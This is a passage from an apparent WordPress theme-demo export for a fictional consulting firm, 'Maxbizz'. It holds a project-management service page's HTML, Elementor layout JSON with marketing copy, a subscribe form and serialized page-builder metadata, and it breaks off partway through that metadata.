		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home2.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-consulting/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>996</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:52:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:52:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"6faa64b","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"0bb9c88","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6824581","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"3400a2a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"c4b8ef3","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a0af2ca","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4ad2da5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c3411e5","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fddc28e","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"fbccab8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2afaea5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"a8024cf","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"d420dea","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"ab89b5a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8c96bde","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Inter","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#4B83FC","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"dc8f05f","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c88ecd3","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a061656","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"b9814ba","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3838be4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"72c6e5e","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ee945f4","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"05b9e13","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"9ff3f8e","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"2a1f3b6","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home2.png","id":1485},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"5c20bfd","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"a5714fa","elType":"widget","settings":{"editor":"<p>Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.<\/p><p>Customer-focused businesses build a virtuous cycle we call the <span style=\"color: #4b83fc;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"b7198e9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"a53f436","elType":"widget","settings":{"title":"Services","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"d016178","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"676aa62","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"aee7a43","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"8dd2aa8","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"67ff888","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"3da52cb","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#4B83FC","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4ffbddf","elType":"widget","settings":{"title":"Contacts","header_size":"h6"},"elements":[],"widgetType":"heading"},{"id":"ecb740e","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"b0441a2","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"00f028b","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9c23145","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"758fa65","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"d84b707","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"1aa5536","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"7cf28b7","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"c141a94","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home2.jpg","id":1510},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"5eb5bda","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"7c9bcb5","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"757ab4a","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#4B83FC","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"b337677","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"66a3274","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"d234fc0","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"6a8f93b","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:4:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:3;s:5:"title";i:3;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:2;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:3;}}}}s:6:"column";a:3:{s:5:"count";i:16;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:16;s:19:"_inline_size_tablet";i:4;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:3:"gap";i:6;s:6:"layout";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:6;s:14:"padding_mobile";i:3;s:6:"margin";i:3;s:13:"margin_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:7:"z_index";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_radius";i:3;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:2;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:2;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:2;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:2;s:9:"icon_size";i:2;}s:18:"section_text_style";a:8:{s:11:"text_indent";i:2;s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i